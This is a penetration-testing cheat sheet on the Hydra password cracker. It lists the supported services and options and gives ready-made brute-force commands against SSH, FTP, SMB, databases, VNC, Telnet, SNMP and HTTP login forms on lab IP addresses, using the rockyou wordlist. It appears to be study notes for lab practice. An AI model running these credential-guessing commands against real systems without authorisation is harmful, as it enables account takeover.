Hydra

Basic Hydra usage:

hydra <Username options> <Password options> <Options> <IP Address> <Protocol> -V -f Supported Services:

adam6500 asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Options: -l Single Username -L Username list -p Password -P Password list -t Limit concurrent connections -V Verbose output -f Stop on correct login -s Port SSH hydra -L usernames.txt -P passwords.txt 192.168.2.66 ssh -V FTP hydra -L usernames.txt -P passwords.txt 192.168.2.62 ftp -V -f SMB hydra -L usernames.txt -P passwords.txt 192.168.2.66 smb -V -f MySQL hydra -L usernames.txt -P passwords.txt 192.168.2.66 mysql -V -f VNC hydra -P passwords.txt 192.168.2.62 vnc -V Postgresql hydra -L usernames.txt -P passwords.txt 192.168.2.62 postgres -V Telnet hydra -L usernames.txt -P passwords.txt 192.168.2.62 telnet -V Hydra HTTP ex1: hydra -L usernames.txt -P passwords.txt 192.168.2.62 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed" Hydra HTTP ex2: hydra -l root@localhost -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 10.11.1.39 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=240&User=^USER^&Password=^PASS^:F=Login failed! Your user name or password was entered incorrectly." //most important to play around with repeater to figure out what we can strip off and still will work so we can lean things out and what we must supply.

Make sure to use burp and see what you need to pass

THC-Hydra

Is another powerful online password cracker under active development and is worth knowing well. It can be used to crack a variety of protocol authentication schemes including SNMP: # hydra -P password-file.txt -v 10.11.1.219 snmp # hydra -l root -P password-file.txt 10.11.1.219 ssh SSH user with password list hydra -l user -P pass.txt -t 10 10.10.10.10 ssh -s 22

PreviousCrunchNextMITM

Last updated